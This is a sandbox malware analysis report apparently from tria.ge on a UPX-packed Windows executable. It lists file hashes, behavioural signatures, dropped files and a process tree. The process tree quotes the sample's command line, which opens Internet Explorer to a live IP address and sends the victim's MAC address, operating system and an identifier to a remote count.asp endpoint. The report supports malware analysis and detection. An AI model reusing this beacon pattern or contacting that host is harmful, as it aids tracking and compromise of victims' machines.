Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

7

Static

static

7

6ce34128a3...9b.exe

windows7-x64

7

6ce34128a3...9b.exe

windows10-2004-x64

7

Analysis

  • max time kernel
    120s
  • max time network
    137s
  • platform
    windows7_x64
  • resource
    win7-20231215-en
  • resource tags

    arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system
  • submitted
    26/12/2023, 12:02

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    6ce34128a380acd62f11e7c717dc659b.exe

  • Size

    50KB

  • MD5

    6ce34128a380acd62f11e7c717dc659b

  • SHA1

    098aad5d2ad5a39afbea44cec3f0b6d3e798d02a

  • SHA256

    ec523820326eadb37a8ea176c6224ca867897c254973547063c5499bd9d2c7f5

  • SHA512

    384654067b93ba4dbc091cafaa001476e8294108542aed4d471587396edc45ed75501e39bc8f9b1208a259c6f7827c7f05c6d938f3343541d239cbce4f5bf0cc

  • SSDEEP

    1536:yakmRBsLfsNhIAsdxn6sM0TZMl9VZdzh5vaYqAzNY:Nki2Lf4hIAsdxn6sM0TZMl9VZdzh5vaH

Score
7/10
upx

Malware Config

Signatures

  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

    upx
  • Drops file in Program Files directory 2 IoCs
  • Drops file in Windows directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies Internet Explorer settings 1 TTPs 38 IoCs
    adwarespyware
  • Modifies registry class 11 IoCs
  • NTFS ADS 1 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\6ce34128a380acd62f11e7c717dc659b.exe
    "C:\Users\Admin\AppData\Local\Temp\6ce34128a380acd62f11e7c717dc659b.exe"
    1⤵
    • Drops file in Program Files directory
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • NTFS ADS
    • Suspicious use of WriteProcessMemory
    PID:1204
    • C:\Program Files\Internet Explorer\iexplore.exe
      "C:\Windows\system32\..\..\Program Files\Internet Explorer\iexplore.exe" http://58.218.198.119:8080/count.asp?mac=ce-25-31-06-96-8e&os=Microsoft Windows XP&flag=5c02046e9b5baebe3a068573cb2073fe&user=6ce34128a380acd62f11e7c717dc659b
      2⤵
      • Modifies Internet Explorer settings
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:2120
      • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2120 CREDAT:275457 /prefetch:2
        3⤵
        • Modifies Internet Explorer settings
        • Suspicious use of SetWindowsHookEx
        PID:1988

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
    Filesize

    344B

    MD5

    e956d0711caef06b98e94b4712b4a1b8

    SHA1

    53a01aa4140d4856f72e1d287d542857627fb5d9

    SHA256

    68f90899b8ced45d33d8bc34fbb062d29165427f83e8bb9878153fa1d2c6412b

    SHA512

    03163daec83cf9c146cb5e189d752fbd3f10d9fe3aeae80dd4f950848473e61112032a3fd78c4cabadbf851207a105e78e4f632e593e515fd527bef0f0f19dd6

    Download Submit

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
    Filesize

    344B

    MD5

    cb0279a5bc833af80f8fb19c6ee53f32

    SHA1

    d7a3cd99eb243a61f29f2d58188e6c0942c63587

    SHA256

    de2ea99d180c1818981030230beff836c9ee38b52ba5c153189a9fc050167ad0

    SHA512

    94e75b733745769b53270a1e6dd4d69e30ca7847ce93a2fda63312300a9418b81fe697486e35eb0466279383002f731f31b3a44a0b415aed2a46d5d62285007c

    Download Submit

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
    Filesize

    344B

    MD5

    44bc5d228ccce63758686ea978684328

    SHA1

    94c19368580ae31fd035aa357b109a8f6156e132

    SHA256

    1a40b6ef3cd258a591bee52bbde184e41afa9783944b4a0a6eae825ed2dde555

    SHA512

    80824f1438da6ec6eab56e3288124f2f72c2df8743e748032e4335e744a14b61f1433e5b2578a73abc6b6f19e5de356d8fec97f034c278b3baf232bd4211a715

    Download Submit

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
    Filesize

    344B

    MD5

    ce21b672ae5634c9fe3d87ac004a4bae

    SHA1

    512f44d61096345a03c23692c81b877ccf85edd3

    SHA256

    73a71826531c1ff63d79165a0ce6c3bff1ebc0a436fadb5541ed9af5d2c983d1

    SHA512

    e0eb1b905428ed6effcc943bb5868b167ffc88fdde37b9dedcad78e82e6dd23a5866425074aa496e6cdf1e0f4cf07e9487ba82e8f55578200838b134f2af2c10

    Download Submit

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
    Filesize

    344B

    MD5

    f14702ed9553d0ec70f995af9c630724

    SHA1

    a9f3c5beb52af1314ea030cb61645268afc7efc9

    SHA256

    6a9b31639d7181174658afcda8401f75c97a23b77e4dbd04a34a304776780df2

    SHA512

    d2c773f59759fe4e6122b3e7a952b5043cbb69cc733a167318f5421a2f8750a4575c00a26d6185cf51f97a124ca05fd7a3e59f02b4d0285cf3d6e9039f6c732c

    Download Submit

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
    Filesize

    344B

    MD5

    86b5924873cc4512e3436aad881dea72

    SHA1

    898675722e396fbea15ffb1303da5d501695c639

    SHA256

    d47afa037e2541ffe649a211cb4b7e9141b7e43a86c942aa7abc4f54bc514c96

    SHA512

    4518c9176e9a5ca337e9eac91e02a1b0b9af719d797fc8d266fc0c5795b9cf4aa350f1a78818ae9e91272c7948c7fd465ccd5a851c5eccae1d97c617c1883902

    Download Submit

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
    Filesize

    344B

    MD5

    16d046451a3af6e9a60aa05718bbd534

    SHA1

    6e5341aa7d43083de1f4d7f8d42e186f307f53f0

    SHA256

    858bb4790128c08d453a2d67cb64f216fb2376902e9360e410a9033a12ee1447

    SHA512

    7ae51198d4f3f49956170b2ebd0b4c04cbe9e4edce5a06043295a5d8c1db8054303d9154b1458df25de54f4ec608454d06c8388a33423497145dee96d57496e1

    Download Submit

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
    Filesize

    344B

    MD5

    c796ac212dff242f91763a724c0889e8

    SHA1

    5f4f0fb43ac7c47ab80c840a441aca152fa6bf71

    SHA256

    1ca7b2c78b9b3dcef8d6654a317e2baed46c204870eb4585637aa76c36f66c11

    SHA512

    ed526e71286cbbd311a16548b7ddef19373ecd6e5b600599549c1b01627136c569c61cc0bf050d3e5aa5d1519464507572c518c36488498555a00a836e9982c8

    Download Submit

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
    Filesize

    344B

    MD5

    f17ce7948942ca143631ed100e607acf

    SHA1

    dafacb58a0cad21416635f6b244bbee919f301cf

    SHA256

    a2ca997d6f0f98550fcbcf2c01615004cc28409d67bbedfa10086c2cf3b36dd8

    SHA512

    9c922a1b4bae3818734f0d75e81fe5b907bfe1219724060c0c7b6d7bfcf1b3faede9c0ec2ffde797a573aefb98032bf7fe38f35a7096a12fceb979eb75e7d3f0

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\Cab3B6E.tmp
    Filesize

    65KB

    MD5

    ac05d27423a85adc1622c714f2cb6184

    SHA1

    b0fe2b1abddb97837ea0195be70ab2ff14d43198

    SHA256

    c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d

    SHA512

    6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\Tar48D9.tmp
    Filesize

    171KB

    MD5

    9c0c641c06238516f27941aa1166d427

    SHA1

    64cd549fb8cf014fcd9312aa7a5b023847b6c977

    SHA256

    4276af3669a141a59388bc56a87f6614d9a9bdddf560636c264219a7eb11256f

    SHA512

    936ed0c0b0a7ff8e606b1cc4175a1f9b3699748ccbba1c3aff96203033d2e9edabf090e5148370df42fbfc4e31d7229493706ff24f19ff42ff7bef74a6baad06

    Download Submit

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.fon
    Filesize

    3KB

    MD5

    ca0294359fd9a7a27616a18c22dbd68a

    SHA1

    12aa0ef1265d0bfe5b3dd60f8aa8b71708f34104

    SHA256

    af5fc76f77e480486e0592397a6a3d22fa750eef1d20e4d5fe54937879096286

    SHA512

    8b5e93b96e3ef5da76db8f0b3bc841151fe868e71ba37cb17a3b4aea7945118983b18988e53d8b498c9a539ad982e1e9b41b5c4117d223246bc44119a8475621

    Download Submit

  • C:\b.txt
    Filesize

    264B

    MD5

    878778e6ae273c74668c90ff5fc48431

    SHA1

    b85a0b7416e86c8f485be4b6c349f0ab426bc5b3

    SHA256

    119d16ac01b447b28a850c44efe9ef52f38ca8b1f9702404451fa7bfa85264c2

    SHA512

    936ae49cac20a0ec4ad87a06f4d55f629341c8713768f52ccc111a95272c7feae5614d897d2df6077b203d1d5c150b6375d1fefc9d8383daf104996501269c09

    Download Submit

  • memory/1204-81-0x0000000000400000-0x0000000000421000-memory.dmp

    Filesize

    132KB

    Download

  • memory/1204-0-0x0000000000400000-0x0000000000421000-memory.dmp

    Filesize

    132KB

    Download